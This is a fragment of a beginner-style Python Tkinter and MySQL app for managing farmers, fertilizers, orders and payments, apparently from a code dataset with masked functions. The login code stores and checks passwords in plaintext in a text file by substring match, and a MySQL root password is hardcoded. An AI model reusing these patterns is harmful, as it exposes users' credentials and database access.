tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_fer)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_fer)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_fer)\n Button.place(x=410, y=50)\n view_fer()\n\n\ndef view_fer():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('fe_formula', 'fe_name',\n 'fe_content', 'fe_price', 'company_id'), xscrollcommand=x_scroll.\n set, yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('fe_formula', text='Fertilizer Formula')\n table.heading('fe_name', text='Fertilizer name')\n table.heading('fe_content', text='Fertilizer content')\n table.heading('fe_price', text='Fertilizer price')\n table.heading('company_id', text='Company_id')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM fertilizer;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_fer_command():\n try:\n sql = 'INSERT INTO fertilizer values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n fertilizer()\n except:\n insert_fer()\n\n\ndef delete_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertilizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_fer_command)\n Button.place(x=400, y=400)\n\n\ndef delete_fer_command():\n try:\n sql = 'DELETE FROM fertilizer WHERE fe_formula=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n fertilizer()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertlizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_fe)\n Button.place(x=300, y=400)\n\n\ndef update_fe():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Fertlizer formula', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Fertlizer name', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Fertlizer content', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Fertlizer price', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='comapny_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_fe)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_fer()\n\n\n<mask token>\n\n\ndef search_fer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Fertlizer formula:', font=('Times new roman',\n 20), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_fe)\n Button.place(x=400, y=400)\n\n\ndef search_fe():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM fertilizer WHERE fe_formula=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=\n fertilizer)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['fertilizer formula: ', 'fertilizer name: ',\n 'fertilizer content: ', 'fertilizer price: ', 'company_id: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid Fertilizer formula', font=(\n 'times new roman', 15))\n l.place(x=100, y=300)\n search_fer()\n\n\ndef orders():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Orders Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_ord)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_ord)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_ord)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_ord)\n Button.place(x=410, y=50)\n view_ord()\n\n\ndef view_ord():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('or_id', 'or_date', 'or_fid',\n 'or_formula', 'or_to'), xscrollcommand=x_scroll.set, yscrollcommand\n =y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('or_id', text='Order Id')\n table.heading('or_date', text='Order Date')\n table.heading('or_fid', text='Ordered Farmer Id')\n table.heading('or_formula', text='Order (item)formula')\n table.heading('or_to', text='Order to')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM orders;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_ord():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=10)\n label = Label(root, text='Order date', font=('Times new roman', 20), bg\n ='white')\n label.place(x=50, y=60)\n label = Label(root, text='Order FID', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=110)\n label = Label(root, text='Order formula', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Order to', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e2.insert(0, datetime.now())\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_ord_command)\n Button.place(x=400, y=400)\n\n\ndef insert_ord_command():\n try:\n sql = 'INSERT INTO orders values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n orders()\n except:\n insert_ord()\n\n\ndef delete_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_ord_command)\n Button.place(x=400, y=400)\n\n\ndef delete_ord_command():\n try:\n sql = 'DELETE FROM orders WHERE or_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n orders()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update_or)\n Button.place(x=300, y=400)\n\n\ndef update_or():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM orders WHERE or_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Order Id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Order Date', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Order f_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Order formula', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Order to', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command_ord)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Order_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_ord()\n\n\ndef update_command_ord():\n sql = (\n 'UPDATE orders SET or_date=%s,or_fid=%s,or_formula=%s,or_to=%s WHERE or_id=%s;'\n )\n vals = e2.get(), e3.get(), e4.get(), e5.get(), e1.get()\n cur.executemany(sql, [vals])\n db.commit()\n orders()\n\n\ndef search_ord():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Order Id:', font=('Times new roman', 20), bg=\n 'tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=orders)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_or)\n Button.place(x=400, y=400)\n\n\ndef search_or():\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n try:\n sql = 'SELECT * FROM orders WHERE or_id=%s;'\n val = [e1.get()]\n cur.execute(sql, val)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=orders)\n Button.place(x=300, y=400)\n for val in cur:\n count = 0\n Y = 50\n names = ['order Id: ', 'Order date: ', 'Order fid: ',\n 'Order formula: ', 'order to: ']\n for i in val:\n label = Label(root, text=names[count] + str(i), font=(\n 'Times new roman', 20), bg='tomato')\n label.place(x=10, y=Y)\n Y += 50\n count += 1\n db.commit()\n except:\n l = Label(root, text='Invalid order id', font=('times new roman', 15))\n l.place(x=100, y=300)\n search_ord()\n\n\ndef payment():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Payment Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_pay)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_pay)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_pay)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_pay)\n Button.place(x=410, y=50)\n view_pay()\n\n\ndef view_pay():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',\n 'p_amount', 'p_method'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id', text='Transaction Id')\n table.heading('p_f_id', text='Farmer Id')\n table.heading('p_date', text='Payment Date')\n table.heading('p_amount', text='Amount')\n table.heading('p_method', text='Payment Method')\n table['show'] = 'headings'\n table.pack()\n cur.execute('SELECT * FROM payment;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_pay():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Transaction farmer id', font=(\n 'Times new roman', 20), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Transaction date', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Transaction amount', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Transaction method', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e3.insert(0, datetime.now())\n e4.place(x=350, y=160)\n e5 = StringVar(root)\n e5.set('Debit card')\n w = OptionMenu(root, e5, 'Credit Card', 'UPI', 'Cheque', 'Cash')\n w.place(x=350, y=210)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_pay_command)\n Button.place(x=400, y=400)\n\n\ndef insert_pay_command():\n try:\n sql = 'INSERT INTO payment values(%s,%s,%s,%s,%s);'\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get()\n cur.executemany(sql, [vals])\n db.commit()\n payment()\n except:\n insert_pay()\n\n\ndef delete_pay():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id:', font=('Times new roman', 20\n ), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n delete_pay_command)\n Button.place(x=400, y=400)\n\n\ndef delete_pay_command():\n try:\n sql = 'DELETE FROM payment WHERE trans_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n payment()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\n<mask token>\n\n\ndef search_pay():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Transaction Id:', font=('Times new roman', 20\n ), bg='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=payment)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_pa)\n Button.place(x=400, y=400)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef First_page(root):\n global T1, T2, T3\n frame = Frame(root, height=500, width=800, bg='ivory')\n frame.pack()\n label = Label(root, text='WELCOME TO AGRI MARKET', font=(\n 'Times new roman', 25))\n label.place(x=200, y=50)\n button = Button(root, text='LogIn', font=('times new roman', 20),\n command=check_pass, bg='green')\n button.place(x=350, y=350)\n L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width=30, bd=5)\n T1.place(x=280, y=200)\n L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width=30, show='*', bd=5)\n T2.place(x=280, y=250)\n reg_button = Button(root, text='Register', font=('Arial Bold', 15), bg=\n 'blue', command=create_pass)\n reg_button.place(x=340, y=400)\n\n\ndef check_pass():\n global root, T1, T2, T3\n try:\n with open('password.txt', 'r') as f:\n lines = f.read()\n if T1.get() + '=' + T2.get() in lines and T1.get(\n ) != '' and T2.get() != '':\n entity_page()\n else:\n label = Label(root, text=\n 'Invalid username or password.Try again', font=(\n 'times new roman', 15))\n label.place(x=200, y=100)\n except:\n label = Label(root, text='Invalid username or password.Try again',\n font=('times new roman', 15))\n label.place(x=200, y=100)\n\n\ndef create_pass():\n global root, T1, T2, T3\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'ivory')\n label.place(x=0, y=0)\n L1 = tk.Label(root, text='Username', font=('Arial Bold', 15), bg='ivory')\n L1.place(x=150, y=200)\n T1 = tk.Entry(root, width=30, bd=5)\n T1.place(x=380, y=200)\n L2 = tk.Label(root, text='Password', font=('Arial Bold', 15), bg='ivory')\n L2.place(x=150, y=250)\n T2 = tk.Entry(root, width=30, show='*', bd=5)\n T2.place(x=380, y=250)\n L2 = tk.Label(root, text='Confirm Password', font=('Arial Bold', 15),\n bg='ivory')\n L2.place(x=150, y=300)\n T3 = tk.Entry(root, width=30, show='*', bd=5)\n T3.place(x=380, y=300)\n reg_button = Button(root, text='Done', font=('Arial Bold', 15), bg=\n 'blue', command=add_pass)\n reg_button.place(x=440, y=400)\n\n\ndef add_pass():\n global root, T1, T2, T3\n if T2.get() != T3.get():\n label = Label(root, text='Incorrect Password. Enter again', font=(\n 'times new roman', 20))\n label.place(x=100, y=100)\n else:\n try:\n with open('password.txt', 'r') as f:\n data = f.read()\n with open('password.txt', 'w') as f:\n f.write(data + '\\n')\n f.write(T1.get() + '=' + T2.get())\n entity_page()\n except:\n with open('password.txt', 'w') as f:\n f.write(T1.get() + '=' + T2.get())\n entity_page()\n\n\ndef entity_page():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'ivory')\n label.place(x=0, y=0)\n label = Label(root, text='WELCOME TO AGRI MARKET ', font=(\n 'Times new roman', 20), bg='blue')\n label.place(x=200, y=20)\n label = Label(root, text='Choose the Entity ', font=('Times new roman',\n 20), bg='white')\n label.place(x=250, y=100)\n Button = tk.Button(root, text='Farmers', font=('Arial', 15), command=farmer\n )\n Button.place(x=100, y=150 + 25)\n Button = tk.Button(root, text='Company', font=('Arial', 15), command=\n company)\n Button.place(x=300, y=150 + 25)\n Button = tk.Button(root, text='Fertilizer', font=('Arial', 15), command\n =fertilizer)\n Button.place(x=500, y=150 + 25)\n Button = tk.Button(root, text='Order', font=('Arial', 15), command=orders)\n Button.place(x=200, y=300 + 25)\n Button = tk.Button(root, text='Payment', font=('Arial', 15), command=\n payment)\n Button.place(x=400, y=300 + 25)\n Button = tk.Button(root, text='GET BOOKING HISTORY', font=('Arial', 15),\n command=history)\n Button.place(x=200, y=400 + 25)\n\n\ndef history():\n global root, cur, db\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n cur.execute('CALL getMonth(%s);', [datetime.today().strftime('%m')])\n data = cur.fetchall()\n label = Label(root, text='The Transaction History of this month', font=\n ('Arial', 15))\n label.place(x=200, y=20)\n button = Button(root, text='BACK', command=entity_page)\n button.place(x=20, y=20)\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('trans_id', 'p_f_id', 'p_date',\n 'p_amount', 'p_method'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('trans_id', text='Transaction Id')\n table.heading('p_f_id', text='Farmer Id')\n table.heading('p_date', text='Payment Date')\n table.heading('p_amount', text='Amount')\n table.heading('p_method', text='Payment Method')\n table['show'] = 'headings'\n table.pack()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n db.close()\n db = mysql.connector.connect(host='localhost', user='root', passwd=\n 'bhushi', database='farmer_app')\n cur = db.cursor()\n\n\ndef farmer():\n global root\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Table', font=('Times new roman', 15),\n bg='white')\n label.place(x=350, y=10)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=\n entity_page)\n Button.place(x=10, y=50)\n Button = tk.Button(root, text='Insert', font=('Arial', 15), command=\n insert_farmer)\n Button.place(x=110, y=50)\n Button = tk.Button(root, text='Delete', font=('Arial', 15), command=\n delete_farmer)\n Button.place(x=210, y=50)\n Button = tk.Button(root, text='Update', font=('Arial', 15), command=\n update_farmer)\n Button.place(x=310, y=50)\n Button = tk.Button(root, text='Search', font=('Arial', 15), command=\n search_farmer)\n Button.place(x=410, y=50)\n view_farmer()\n\n\ndef view_farmer():\n frame = Frame(root, bd=5, relief=RIDGE, bg='tomato')\n frame.place(x=10, y=100, width=750, height=400)\n x_scroll = Scrollbar(frame, orient=HORIZONTAL)\n y_scroll = Scrollbar(frame, orient=VERTICAL)\n table = ttk.Treeview(frame, columns=('f_id', 'f_name', 'f_phone',\n 'f_mail', 'f_locality', 'f_address'), xscrollcommand=x_scroll.set,\n yscrollcommand=y_scroll.set)\n x_scroll.pack(side=BOTTOM, fill=X)\n y_scroll.pack(side=RIGHT, fill=Y)\n x_scroll.config(command=table.xview)\n y_scroll.config(command=table.yview)\n table.heading('f_id', text='Farmer Id')\n table.heading('f_name', text='Farmer Name')\n table.heading('f_phone', text='Farmer Phone')\n table.heading('f_mail', text='Farmer Mail')\n table.heading('f_locality', text='Farmer Locality')\n table.heading('f_address', text='Farmer Address')\n table['show'] = 'headings'\n table.column('f_id', width=100)\n table.pack()\n cur.execute('SELECT * FROM farmer;')\n data = cur.fetchall()\n db.commit()\n if len(data) != 0:\n for row in data:\n table.insert('', END, values=row)\n\n\n<mask token>\n\n\ndef insert_farmer():\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer_id', font=('Times new roman', 20), bg=\n 'white')\n label.place(x=50, y=10)\n label = Label(root, text='Farmer_name', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Farmer_phone', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Farmer_mail', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Farmer_locality', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=210)\n label = Label(root, text='Farmer_address', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=270)\n e1 = Entry(root, width=50)\n e2 = Entry(root, width=50)\n e3 = Entry(root, width=50)\n e4 = Entry(root, width=50)\n e5 = Entry(root, width=50)\n e6 = Entry(root, width=50)\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n e6.place(x=350, y=270)\n Button = tk.Button(root, text='Back', font=('Arial', 15), command=farmer)\n Button.place(x=200, y=400)\n Button = tk.Button(root, text='Commit', font=('Arial', 15), command=\n insert_farmer_command)\n Button.place(x=400, y=400)\n\n\ndef insert_farmer_command():\n global root\n try:\n sql = 'INSERT INTO farmer values(%s,%s,%s,%s,%s,%s);'\n if len(e1.get()) > 3:\n invalid('farmer')\n else:\n vals = e1.get(), e2.get(), e3.get(), e4.get(), e5.get(), e6.get()\n cur.executemany(sql, [vals])\n db.commit()\n farmer()\n except:\n insert_farmer()\n\n\ndef invalid(page):\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n if page == 'farmer':\n label = Label(root, text='Enter valid farmer_id', font=(\n 'Times new roman', 30), bg='white')\n label.place(x=170, y=200)\n button = Button(root, text='Re-enter', font=('Times new roman', 20),\n command=insert_farmer)\n button.place(x=300, y=400)\n elif page == 'company':\n label = Label(root, text='Enter valid company_id', font=(\n 'Times new roman', 30), bg='white')\n label.place(x=170, y=200)\n button = Button(root, text='Re-enter', font=('Times new roman', 20),\n command=insert_company)\n button.place(x=300, y=400)\n\n\n<mask token>\n\n\ndef delete_farmer_command():\n try:\n sql = 'DELETE FROM farmer WHERE f_id=%s;'\n cur.execute(sql, [e1.get()])\n db.commit()\n farmer()\n except:\n l = Label(root, text='Invalid Entry', font=('times new roman', 15))\n l.place(x=100, y=300)\n\n\ndef update_farmer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), bg=\n 'tomato')\n label.place(x=0, y=0)\n label = Label(root, text='Farmer Id:', font=('Times new roman', 20), bg\n ='tomato')\n label.place(x=100, y=200)\n e1 = Entry(root, width=50)\n e1.place(x=300, y=200)\n Button = tk.Button(root, text='OK', font=('Arial', 15), command=update)\n Button.place(x=300, y=400)\n\n\ndef update():\n try:\n global e1, e2, e3, e4, e5, e6\n label = Label(root, text=' ' * 800, font=('Times new roman', 500),\n bg='tomato')\n label.place(x=0, y=0)\n sql = 'SELECT * FROM farmer WHERE f_id=%s;'\n vals = [e1.get()]\n cur.execute(sql, vals)\n label = Label(root, text='Farmer_id', font=('Times new roman', 20),\n bg='white')\n label.place(x=50, y=10)\n label = Label(root, text='Farmer_name', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=60)\n label = Label(root, text='Farmer_phone', font=('Times new roman', \n 20), bg='white')\n label.place(x=50, y=110)\n label = Label(root, text='Farmer_mail', font=('Times new roman', 20\n ), bg='white')\n label.place(x=50, y=160)\n label = Label(root, text='Farmer_locality', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=210)\n label = Label(root, text='Farmer_address', font=('Times new roman',\n 20), bg='white')\n label.place(x=50, y=270)\n e1 = Entry(root)\n e2 = Entry(root)\n e3 = Entry(root)\n e4 = Entry(root)\n e5 = Entry(root)\n e6 = Entry(root)\n data = cur.fetchall()\n arr = [e1, e2, e3, e4, e5, e6]\n count = 0\n for val in data[0]:\n arr[count].insert(0, val)\n count += 1\n e1.place(x=350, y=10)\n e2.place(x=350, y=60)\n e3.place(x=350, y=110)\n e4.place(x=350, y=160)\n e5.place(x=350, y=210)\n e6.place(x=350, y=270)\n label = Button(root, text='Modify', font=('Times new roman', 20),\n bg='blue', command=update_command)\n label.place(x=300, y=400)\n except:\n l = Label(root, text='Invalid Farmer_id', font=('times new roman', 15))\n l.place(x=100, y=300)\n update_farmer()\n\n\ndef update_command():\n try:\n sql = (\n 'UPDATE farmer SET f_name=%s,f_phone_no=%s,f_mail=%s,f_locality=%s,f_address=%s WHERE f_id=%s;'\n )\n vals = e2.get(), e3.get(), e4.get(), e5.get(), e6.get(), e1.get()\n cur.executemany(sql, [vals])\n db.commit()\n farmer()\n except:\n update_farmer()\n\n\ndef search_farmer():\n global e1\n label = Label(root, text=' ' * 800, font=('Times new roman', 500), 